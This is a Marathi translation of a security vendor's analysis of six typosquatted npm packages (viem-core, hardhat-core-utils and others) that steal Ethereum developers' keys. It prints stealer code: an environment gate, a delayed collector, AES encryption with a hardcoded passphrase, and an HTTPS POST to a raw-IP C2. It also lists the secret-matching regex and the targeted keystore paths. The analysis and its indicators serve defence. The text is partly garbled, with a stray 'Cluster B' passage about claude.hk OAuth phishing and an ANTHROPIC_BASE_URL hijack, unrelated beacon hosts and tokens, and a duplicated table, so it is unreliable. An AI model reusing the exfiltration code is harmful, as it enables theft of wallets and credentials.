EVMDeFi npm टायपोस्क्वॉटिंग हल्ल्यामुळे डेव्हलपर कीज चोरल्या जातात

EVM/DeFi npm टायपोस्क्वॉटिंग हल्ल्यामुळे डेव्हलपर कीज चोरल्या जातात

अनुक्रमणिका

अवश्य वाचा

नवीनतम मनोरंजक पोस्ट्स

TL; डॉ

६ मे २०२६ रोजी, एकच एनपीएम पब्लिशर, namikazesarada010206इथेरियम, सॉलिडिटी आणि डीफाय डेव्हलपर इकोसिस्टमला लक्ष्य करून सहा दुर्भावनापूर्ण पॅकेजेस प्रसारित केली.

पॅकेजेस, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utilsआणि web3-utils-coreलोकप्रिय वेब3 टूलिंगसाठी हेल्पर लायब्ररीसारखे दिसण्यासाठी तयार केलेली विश्वासार्ह नावे वापरली.

सर्व सहा पॅकेजमध्ये सारखेच होते telemetry.js फाईल. ती फाईल संपूर्ण क्लस्टरमध्ये बाइट-एकसारखी होती, SHA-256 सह:

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

मालवेअर इन्स्टॉलच्या वेळी कार्यान्वित होत नाही. preinstall or postinstall हुक. त्याऐवजी, जेव्हा पॅकेज याच्याद्वारे आयात केले जाते तेव्हा ते सक्रिय होते. require().

तो तपशील महत्त्वाचा आहे.

जोपर्यंत एखादा डेव्हलपर प्रत्यक्षात पॅकेज वापरत नाही, तोपर्यंत इम्प्लांट थांबतो. त्यानंतर ते तपासते की वर्कस्टेशन खऱ्या इथेरियम / सॉलिडिटी डेव्हलपमेंट एन्व्हायर्नमेंटसारखे दिसते का. ते अल्केमी किंवा इन्फुरा कीज, प्रायव्हेट कीज, निमोनिक्स, डिप्लॉयर कीज किंवा लोकल फाउंड्री डिरेक्टरी शोधते.

होस्ट जुळल्यास, चोर SSH प्रायव्हेट की, फाउंड्री / गेथ / ब्राउनी वॉलेट कीस्टोअर्स गोळा करतो, .env* फाइल्स आणि संवेदनशील एन्व्हायर्नमेंट व्हेरिएबल्स. ते हार्डकोडेड पासफ्रेज वापरून AES-256-GCM ने बंडल एन्क्रिप्ट करते आणि TLS व्हेरिफिकेशन अक्षम असलेल्या रॉ IPv4 C2 एंडपॉइंटवर ते एक्सफिल्ट्रेट करते.

झायजेनीच्या मालवेअर अर्ली वॉर्निंग (MEW) प्रणालीने सर्व सहा पॅकेजेस दुर्भावनापूर्ण असल्याची पुष्टी केली आहे. एनपीएम रजिस्ट्री टेकडाउन रिपोर्ट बंडल प्रलंबित आहे.

क्लस्टर: सहा पॅकेजेस, एक प्रकाशक

प्रकाशक खाते namikazesarada010206 अपुष्ट जीमेल पत्त्याशी जोडलेले होते namikazesarada010206@gmail.com.

ही मोहीम ६ मे, २०२६ रोजी एकाच दिवसात प्रसिद्ध झाली. सर्व सहा पॅकेजेस खालीलप्रमाणे आवृत्तीबद्ध करण्यात आली होती. 1.0.0, ज्याला शून्य रनटाइम अवलंबित्व होते, आणि ज्यामध्ये फक्त तीन फाइल्स होत्या:

package.json index.js telemetry.js

त्यांनी तेच सोर्स रिपॉझिटरी देखील घोषित केले:

https://github.com/harunosakura030303-maker/evmchain-config

पहिले तीन पॅकेजेस पहिल्या प्रकाशनावेळी MEW स्कॅनर्सनी पकडले. प्रकाशकाच्या npm प्रोफाइलच्या विश्लेषक पुनरावलोकनानंतर उर्वरित तीन पॅकेजेसवर फोर्स-फ्लॅगिंग करण्यात आले. एकदा समान बाइट-आयडेंटिकल telemetry.js संपूर्ण क्लस्टरमध्ये याची पुष्टी झाली, सुसंगततेच्या आधारावर त्यांना दुर्भावनापूर्ण म्हणून बंद करण्यात आले.

पॅकेज आवृत्ती एनपीएम प्रकाशित एमईडब्ल्यू तिकीट निर्णय
व्हिएम-कोर 1.0.0 2026-05-06 01:38:44Z #51049 दुर्भावनायुक्त
viem-utils-core 1.0.0 2026-05-06 #51050 दुर्भावनायुक्त
हार्डहॅट-कोअर-यूटिल्स 1.0.0 2026-05-06 #51051 दुर्भावनायुक्त
evm-utils 1.0.0 2026-05-06 #51069 सातत्यपूर्णपणे दुर्भावनापूर्ण
फाउंड्री-युटील 1.0.0 2026-05-06 #51071 सातत्यपूर्णपणे दुर्भावनापूर्ण
वेब3-यूटिल्स-कोर 1.0.0 2026-05-06 #51070 सातत्यपूर्णपणे दुर्भावनापूर्ण

नामकरण पद्धत सरळ पण प्रभावी आहे.

हे पॅकेजेस मूळ अपस्ट्रीम नावांचे तंतोतंत अनुकरण करत नाहीत. त्याऐवजी, ते खालीलप्रमाणे संभाव्य “युटिलिटी” प्रत्यय वापरतात: -core, -utilsआणि -utils-coreत्यामुळे त्या अशा सहयोगी लायब्ररींसारख्या दिसतात ज्या डेव्हलपरला वेब3 टूलिंगजवळ पाहायला मिळतील अशी अपेक्षा असते.

दुर्भावनापूर्ण पॅकेज कायदेशीर लक्ष्य
व्हिएम-कोर viem, एक लोकप्रिय इथेरियम टाइपस्क्रिप्ट क्लायंट
viem-utils-core व्हिएम
हार्डहॅट-कोअर-यूटिल्स हार्डहॅट, एक मुख्य प्रवाहातील सॉलिडिटी विकास वातावरण
evm-utils जेनेरिक ईव्हीएम टूलिंग नेमस्पेस
फाउंड्री-युटील फाउंड्री, एक सॉलिडिटी टूलचेन
वेब3-यूटिल्स-कोर वेब3-यूटिल्स, वेब3.js मदतनीस

हा “पूरक पॅकेज” नमुना आहे: “मीच खरे पॅकेज आहे” असे न म्हणता, “मी खऱ्या पॅकेजच्या आसपास एक योग्य मदतनीस असल्यासारखा दिसतो.”

DeFi डेव्हलपर्ससाठी वेगाने पुढे जाणे, हे देखील धोका निर्माण करण्यासाठी पुरेसे आहे.

जेव्हा पॅकेज आयात केले जाते तेव्हा काय होते?

हल्ल्याची साखळी लहान, हेतुपुरस्सर आखलेली आणि क्रिप्टो-डेव्हलपमेंट वातावरणावर केंद्रित आहे.

इन्स्टॉलेशनसाठी कोणतीही सोय नाही. त्याऐवजी, प्रत्येक पॅकेजमध्ये एक index.js जे स्टब फंक्शनॅलिटी निर्यात करते आणि नंतर दुर्भावनापूर्ण टेलीमेट्री मॉड्यूल लोड करते.

require('./telemetry').init();

याचा अर्थ असा की, मालवेअर पहिल्यांदा आयात केल्यावरच सक्रिय होतो.

हे हल्लेखोरासाठी कार्यान्वयनाच्या दृष्टीने उपयुक्त आहे. अनेक स्कॅनर आणि सँडबॉक्स इन्स्टॉल-वेळच्या वर्तनावर लक्ष केंद्रित करतात. हे पॅकेज एखाद्या डेव्हलपर, बिल्ड स्क्रिप्ट, टेस्ट सूट किंवा रनटाइम पाथद्वारे प्रत्यक्षात वापरले जाईपर्यंत थांबते.

ॲक्टिव्हेशन गेट: केवळ अस्सल वेब3 डेव्हलपर वर्कस्टेशन्सवरच सुरू होते

इम्प्लांटचा सर्वात महत्त्वाचा भाग म्हणजे ॲक्टिव्हेशन गेट होय.

हा मालवेअर, इथेरियम / सॉलिडिटी डेव्हलपर मशिन्सवर सामान्यतः आढळणाऱ्या एन्व्हायर्नमेंट व्हेरिएबल्सची तपासणी करतो:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

फाउंड्री इन्स्टॉल केलेले आहे की नाही हे देखील तपासले जाते:

fs.existsSync(path.join(os.homedir(), '.foundry'))

जर दोन्हीपैकी कोणतीही अट खरी नसेल, तर फंक्शन परत येते आणि काहीही करत नाही.

त्यामुळे सामान्य विश्लेषण वातावरणात पॅकेज अधिक शांतपणे चालते. फाउंड्री, अल्केमी कीज, इन्फुरा कीज, प्रायव्हेट कीज किंवा निमोनिक्स नसलेल्या सँडबॉक्समध्ये एक निरुपद्रवी दिसणारी आयात दिसू शकते.

जुळणाऱ्या होस्टवर, मालवेअर माहिती गोळा करण्यापूर्वी ६० ते ९० सेकंद थांबतो:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

या विलंबामुळे आयात आणि निर्गमन यांमधील स्पष्ट सहसंबंध कमी होतो. .unref() जर पॅकेज अल्पायुषी स्क्रिप्टमध्ये आयात केले असेल, तर 'call' होस्ट प्रक्रियेला सामान्यपणे बाहेर पडण्याची परवानगी देखील देतो.

ही गोंधळ निर्माण करणारी तोडफोड नाही. हा एक लक्ष्यित चोर आहे, जो डेव्हलपर एन्व्हायर्नमेंटमधून चोरी करणे फायदेशीर असल्याशिवाय चालू न होण्यासाठी तयार केला आहे.

चोर काय गोळा करतो

एकदा सक्रियतेची पायरी ओलांडली की, मालवेअर वेब3 डेव्हलपमेंटमधील सर्वात महत्त्वाच्या स्त्रोतांकडून माहिती गोळा करतो: प्रायव्हेट की, वॉलेट कीस्टोअर, डिप्लॉयमेंट क्रेडेंशियल्स, क्लाउड सिक्रेट्स, एनपीएम टोकन्स आणि लोकल प्रोजेक्ट कॉन्फिगरेशन.

स्रोत काय गोळा केले जाते
प्रक्रिया.एनव्ही /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i शी जुळणारे कोणतेही व्हेरिएबल
~/.ssh/* PRIVATE KEY किंवा BEGIN OPENSSH असलेले, संपूर्ण फाईल सामग्रीसह असलेले फाईल्स.
~/.foundry/keystores/* फाउंड्री वॉलेट कीस्टोअर फाइल्स
~/.इथेरियम/कीस्टोअर/* गेथ वॉलेट कीस्टोअर फाइल्स
~/.brownie/accounts/* ब्राउनी वॉलेट कीस्टोअर फाइल्स
${cwd}/.env संपूर्ण फाईल सामग्री
${cwd}/.env.local संपूर्ण फाईल सामग्री
${cwd}/.env.production संपूर्ण फाईल सामग्री
${cwd}/.env.development संपूर्ण फाईल सामग्री
os.hostname() होस्ट मेटाडेटा
क्रिप्टो.रँडमयूयूआयडी() पीडित/सत्र ओळखकर्ता
तारीख.आता() संकलन टाइमस्टॅम्प
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

ATTA टोकन्स खालीलप्रमाणे आहेत:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

टेलिमेट्री हे ऑपरेटरचे स्वतःचे विश्लेषण होते की स्वतंत्रपणे कमाई करणारे चॅनल होते, याची आम्ही पुष्टी करू शकलो नाही. आम्ही तपासलेल्या दोन्ही नमुन्यांमध्ये ATTA टोकन्स समान आहेत.

क्लस्टर बी: हेबाई

claude.hk OAuth फिशिंग + ANTHROPIC_BASE_URL हायजॅक

१ एप्रिलचा नमुना हा मोहिमेचा अधिक प्राथमिक आणि सुरुवातीचा टप्पा आहे.

heibai:2.1.88-claude.hk-4 यांनी प्रकाशित केले होते wuguoqiangvip28७ जून, २०२५ रोजी तयार केलेले खाते. पॅकेजने वैध आवृत्तीच्या तुलनेत स्वतःची आवृत्ती स्पष्टपणे निश्चित केली. 2.1.88 मानवी मुक्तता.

ते CA-cert MITM ची पर्वा करत नाही. त्याऐवजी, ते वापरकर्त्याला OAuth एंडपॉइंटबद्दल खोटे सांगते.

लीक झालेल्या क्लॉड कोड सोर्समधील दुर्भावनापूर्ण जोडण्यांमध्ये खालील गोष्टींचा समावेश आहे:

स्रोत काय गोळा केले जाते
प्रक्रिया.एनव्ही /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i शी जुळणारे कोणतेही व्हेरिएबल
~/.ssh/* PRIVATE KEY किंवा BEGIN OPENSSH असलेले, संपूर्ण फाईल सामग्रीसह असलेले फाईल्स.
~/.foundry/keystores/* फाउंड्री वॉलेट कीस्टोअर फाइल्स
~/.इथेरियम/कीस्टोअर/* गेथ वॉलेट कीस्टोअर फाइल्स
~/.brownie/accounts/* ब्राउनी वॉलेट कीस्टोअर फाइल्स
${cwd}/.env संपूर्ण फाईल सामग्री
${cwd}/.env.local संपूर्ण फाईल सामग्री
${cwd}/.env.production संपूर्ण फाईल सामग्री
${cwd}/.env.development संपूर्ण फाईल सामग्री
os.hostname() होस्ट मेटाडेटा
क्रिप्टो.रँडमयूयूआयडी() पीडित/सत्र ओळखकर्ता
तारीख.आता() संकलन टाइमस्टॅम्प

लक्ष्यांची यादी अत्यंत विशिष्ट आहे. ही सर्वसाधारण ब्राउझर चोरी किंवा व्यापक क्रेडेन्शियल स्क्रॅपिंग नाही. याचा उद्देश इथेरियम ॲप्लिकेशन्स तयार करणाऱ्या, त्यांची चाचणी करणाऱ्या, त्यांना तैनात करणाऱ्या किंवा चालवणाऱ्या डेव्हलपर्सना लक्ष्य करणे आहे.

फाउंड्री, गेथ आणि ब्राउनी कीस्टोअर्सचा समावेश विशेषतः महत्त्वाचा आहे. या फाईल्स वॉलेट्स किंवा डिप्लॉयमेंट आयडेंटिटीजमध्ये थेट प्रवेश दर्शवू शकतात. जर हल्लेखोर त्यांना पासवर्ड, निमोनिक्स किंवा एन्व्हायर्नमेंट सिक्रेट्ससोबत जोडू शकला, तर तो निधी हस्तांतरित करू शकतो, डिप्लॉयर्सची बतावणी करू शकतो किंवा स्मार्ट कॉन्ट्रॅक्ट ऑपरेशन्सशी तडजोड करू शकतो.

माहिती बाहेर काढण्यापूर्वी एनक्रिप्शन

मालवेअर गोळा केलेला डेटा बाहेर पाठवण्यापूर्वी एनक्रिप्ट करतो.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

हार्डकोडेड पासफ्रेज खालीलप्रमाणे आहे:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

अंतिम पेलोड JSON स्वरूपात गुंडाळलेला आहे:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

एनक्रिप्शनमुळे मालवेअर स्वतःहून अधिक प्रगत होत नाही. मात्र, त्यामुळे नेटवर्क तपासणी अधिक कठीण होते. बाहेर जाणाऱ्या डेटावर लक्ष ठेवणाऱ्या सुरक्षा रक्षकाला JSON पेलोड दिसेल, पण चोरलेल्या कीज, वॉलेट फाइल्स किंवा इतर काहीही दिसणार नाही. .env हार्डकोडेड पासफ्रेज आणि डिक्रिप्शन लॉजिकशिवाय असलेली सामग्री.

रॉ IPv4 C2 मध्ये गळती

बाहेर पडण्याचा मार्ग हार्डकोड केलेला आहे:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

मालवेअर खालील ठिकाणी डेटा पाठवतो:

https://76.13.37.80:8443/api/v1/telemetry

दोन तपशील ठळकपणे दिसतात.

सर्वप्रथम, C2 हा डोमेन नसून एक मूळ IPv4 ॲड्रेस आहे. त्यामुळे डोमेन नोंदणीची गरज नाहीशी होते आणि डोमेन-आधारित काही ओळख टाळली जाते.

दुसरे म्हणजे, TLS पडताळणी खालीलप्रमाणे अक्षम केली जाते:

rejectUnauthorized: false

त्यामुळे मालवेअरला स्वयं-स्वाक्षरित प्रमाणपत्रांसहित कोणतेही प्रमाणपत्र स्वीकारता येते. दुसऱ्या शब्दांत सांगायचे झाल्यास, हल्लेखोराला वैध सार्वजनिक प्रमाणपत्राची गरज न भासता एनक्रिप्टेड ट्रान्सपोर्ट मिळतो.

पुन्हा प्रयत्न करण्याची कोणतीही पद्धत नाही आणि कोणताही पर्यायी होस्ट नाही. त्रुटी कोणत्याही सूचनेशिवाय दुर्लक्षित केल्या जातात. यामुळे C2 ऑफलाइन किंवा पोहोचण्यायोग्य नसल्यास पॅकेज शांत राहते.

ही मोहीम का महत्त्वाची आहे

डेव्हलपर्सना लक्ष्य करणारे बहुतेक दुर्भावनापूर्ण npm पॅकेजेस व्यापक क्रेडेन्शियल्स मिळवण्याचा प्रयत्न करतात: npm टोकन्स, AWS कीज, GitHub टोकन्स, किंवा .npmrc फायली

ही मोहीम लक्ष्य मर्यादित करते.

ते मशीन इथेरियम किंवा सॉलिडिटी डेव्हलपरचे आहे याची चिन्हे शोधते. त्यानंतर ते त्या एनवायरनमेंटमधील नेमके तेच असेट्स मिळवते जे महत्त्वाचे आहेत: वॉलेट कीस्टोअर्स, प्रायव्हेट कीज, निमोनिक्स, डिप्लॉयर कीज. .env फाईल्स आणि SSH कीज.

त्यामुळे ही मोहीम एखाद्या सामान्य एनपीएम चोरापेक्षा वेब3 टीम्ससाठी अधिक धोकादायक ठरते.

यशस्वी संसर्गामुळे खालील गोष्टी उघड होऊ शकतात:

  • डिप्लॉयमेंट वॉलेट्स
  • स्मार्ट कॉन्ट्रॅक्ट अ‍ॅडमिन कीज
  • आरपीसी प्रदाता की
  • क्लाउड डिप्लॉयमेंट क्रेडेन्शियल्स
  • npm टोकन प्रकाशित करत आहे
  • डेव्हलपर किंवा बिल्ड इन्फ्रास्ट्रक्चरला SSH ऍक्सेस
  • प्रकल्पाची गुपिते संग्रहित आहेत .env फाइल
  • फाउंड्री, गेथ किंवा ब्राउनीसाठी वॉलेट कीस्टोअर्स

पॅकेजच्या नावांमध्येही स्पष्ट सोशल इंजिनिअरिंग दिसून येते. ते परिचित टूलच्या नावांचा वापर करून वेब3 डेव्हलपर इकोसिस्टमला लक्ष्य करतात: viem, hardhat, foundry, evmआणि web3.

कलाकाराला मूळ प्रकल्पांशी तडजोड करण्याची गरज नाही. त्यांना फक्त एका डेव्हलपरने एक वाजवी वाटणारे पूरक पॅकेज स्थापित करण्याची आवश्यकता आहे.

तडजोड आणि शोधाचे निर्देशक

पॅकेजेस आणि प्रकाशक
फील्ड मूल्य
एनपीएम प्रकाशक namikazesarada010206
प्रकाशकाचा ईमेल namikazesarada010206@gmail.com
ईमेल सत्यापित नाही
SCM सत्यापित नाही
प्रतिष्ठा गुण 1.0
पॅकेजेस viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core
आवृत्त्या सर्व 1.0.0
स्रोत भांडार https://github.com/harunosakura030303-maker/evmchain-config
घातक असल्याचे सिद्ध झाले सर्व सहा पॅकेजेस
नेटवर्क
प्रकार मूल्य
C2 एंडपॉइंट https://76.13.37.80:8443/api/v1/telemetry
सी२ आयपी 76.13.37.80
C2 पोर्ट 8443/tcp
TLS वर्तन अनधिकृत नाकारले: खोटे
पेलोड स्कीमा {"v":2,"iv": "d": "t": }
फाईल्स आणि हॅशेस
प्रकार मूल्य
टेलीमेट्री.जेएस SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
पॅकेज लेआउट package.json, index.js, telemetry.js
फाइल संख्या 3
अंदाजे एकूण आकार 3.4 KB

सक्रियकरण सिग्नल

मालवेअर खालील एन्व्हायर्नमेंट व्हेरिएबल्स तपासतो:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

हे खालील गोष्टींची देखील तपासणी करते:

~/.foundry/

लक्ष्यित होस्ट मार्ग

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

कलेक्शन रेगेक्स

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

शोध नोंदी

संपूर्ण वर्तणूक विश्लेषणाची गरज न भासता, अनेक नियम या मोहिमेला पकडतात.

सर्वप्रथम, लॉकफाईल्समध्ये सहा दुर्भावनापूर्ण पॅकेज नावांची तपासणी करा:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

कोणत्याही सामन्यात package-lock.json, yarn.lock, pnpm-lock.yamlकिंवा node_modules इतिहासाला एक गंभीर घटना म्हणून हाताळले पाहिजे.

दुसरे म्हणजे, वॉलेट कीस्टोअर पाथ वाचणाऱ्या Node.js प्रक्रियांवर लक्ष ठेवा:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

हेल्पर डिपेंडन्सी म्हणून इम्पोर्ट केलेल्या पॅकेजसाठी हे क्वचितच योग्य वर्तन असते. आणि जेव्हा यानंतर बाह्य नेटवर्क हालचाल दिसून येते, तेव्हा ते विशेषतः संशयास्पद ठरते.

तिसरे, खालील HTTPS कनेक्शन्सवर ब्लॉक करा किंवा अलर्ट द्या:

76.13.37.80:8443

विशेषतः जेव्हा विनंतीचा मार्ग असा असतो:

/api/v1/telemetry

चौथे, खालील वैशिष्ट्ये असलेले npm पॅकेजेस शोधा:

  • नवीन किंवा कमी प्रतिष्ठा असलेला प्रकाशक
  • अपुष्ट जीमेल खाते
  • वेब3-लगत पॅकेजचे नाव
  • कोणताही अर्थपूर्ण रिपॉझिटरी इतिहास नाही
  • लहान पॅकेज लेआउट
  • index.js जी टेलीमेट्री किंवा हेल्पर फाइल लोड करते
  • कोणतेही रनटाइम अवलंबित्व नाही
  • संवेदनशील पर्यावरण-चलांचा संग्रह
  • वॉलेट कीस्टोअर ऍक्सेस

एकाच IOC पेक्षा ही पद्धत अधिक उपयुक्त आहे, कारण पुढील पॅकेज IP पत्ता बदलू शकते, परंतु लक्ष्यीकरण तर्कशास्त्र तेच ठेवू शकते.

तडजोड प्रतिसाद तपासणी सूची

जर एखाद्या डेव्हलपरने सहा पॅकेजपैकी एक वापरला असेल आणि त्यांचे वातावरण ॲक्टिव्हेशन गेटशी जुळत असेल, तर ते वर्कस्टेशन असुरक्षित आहे असे समजा.

त्यामध्ये फाउंड्री इन्स्टॉल केलेली मशीन्स, एनवायरनमेंटमधील अल्केमी किंवा इन्फुरा कीज, प्रायव्हेट कीज, निमोनिक्स किंवा डिप्लॉयर कीज यांचा समावेश आहे.

शिफारसित प्रतिसाद:

  • होस्टला नेटवर्कपासून डिस्कनेक्ट करा.
  • जतन करा node_modulesफॉरेन्सिकसाठी लॉकफाईल्स, शेल हिस्ट्री आणि संबंधित लॉग्स.
  • प्रत्येक SSH कीपेअर फिरवा ~/.ssh/.
  • प्रत्येक कीस्टोअरसाठी वॉलेट की फिरवा ~/.foundry, ~/.ethereumआणि ~/.brownie.
  • नवीन वॉलेटमध्ये निधी हस्तांतरित करा.
  • साठवलेले प्रत्येक रहस्य फिरवा .env* डेव्हलपरने काम केलेल्या रिपॉझिटरीमधील फाईल्स.
  • कलेक्शन रेगएक्सशी जुळणारे एन्व्हायर्नमेंट सिक्रेट्स रोटेट करा, ज्यामध्ये AWS कीज, npm टोकन्स, डिप्लॉय टोकन्स, API कीज, प्रायव्हेट कीज, सीड्स आणि निमोनिक्स यांचा समावेश आहे.
  • पॅकेज पहिल्यांदा इन्स्टॉल केल्यापासून क्लाउड, एनपीएम, गिटहब, आरपीसी प्रोव्हायडर आणि ब्लॉकचेन ॲक्टिव्हिटीचे ऑडिट करा.
  • वर्कस्टेशनचा पुन्हा वापर करण्यापूर्वी त्यावर री-इमेजिंग करा.

बचावपटूंनी काय लक्षात ठेवावे

ही मोहीम दाखवते की उच्च-मूल्याच्या डेव्हलपर इकोसिस्टममध्ये एनपीएम टायपोस्क्वॉटिंग कसे विकसित होत आहे.

त्या ॲक्टरला सातत्याची गरज नव्हती. त्यांना अस्पष्टीकरणाची गरज नव्हती. त्यांना इन्स्टॉल-टाइम एक्झिक्यूशनची सुद्धा गरज नव्हती.

त्याऐवजी, त्यांनी तीन गोष्टींवर अवलंबून राहण्याचा निर्णय घेतला:

  • संभाव्य वेब3 पॅकेज नावे
  • सक्रियकरण फक्त खऱ्या क्रिप्टो-डेव्हलपमेंट मशीनवरच
  • इथेरियम डेव्हलपर्ससाठी सर्वात महत्त्वाच्या असलेल्या फाइल्स आणि गुपितांची थेट चोरी

त्यामुळे वरवर पाहता ही मोहीम नजरेतून सहज सुटू शकते आणि योग्य वातावरणात राबवल्यास धोकादायक ठरू शकते.

वेब3 टीम्ससाठी धडा स्पष्ट आहे: डिपेंडन्सीच्या नावांना तुमच्या थ्रेट मॉडेलचा भाग माना. एक पॅकेज जे निरुपद्रवी हेल्परसारखे दिसते, तेदेखील वॉलेट कॉम्प्रोमाइज करण्याचा सर्वात सोपा मार्ग ठरू शकते.

एनपीएम रजिस्ट्रीमध्ये कळवण्यात आले आहे. जेव्हा पब्लिशर खाते आणि पॅकेजेस काढून टाकले जातील, तेव्हा आम्ही ही पोस्ट अद्ययावत करू.

sca-tools-software-composition-analysis-tools
तुमच्या सॉफ्टवेअरमधील धोक्यांना प्राधान्य द्या, त्यांचे निवारण करा आणि त्यांना सुरक्षित करा.
आपले मोफत खाते मिळवा.
क्रेडिट कार्ड आवश्यक नाही.

तुमचा सॉफ्टवेअर विकास आणि वितरण सुरक्षित करा

झायगेनी प्रोडक्ट सूटसह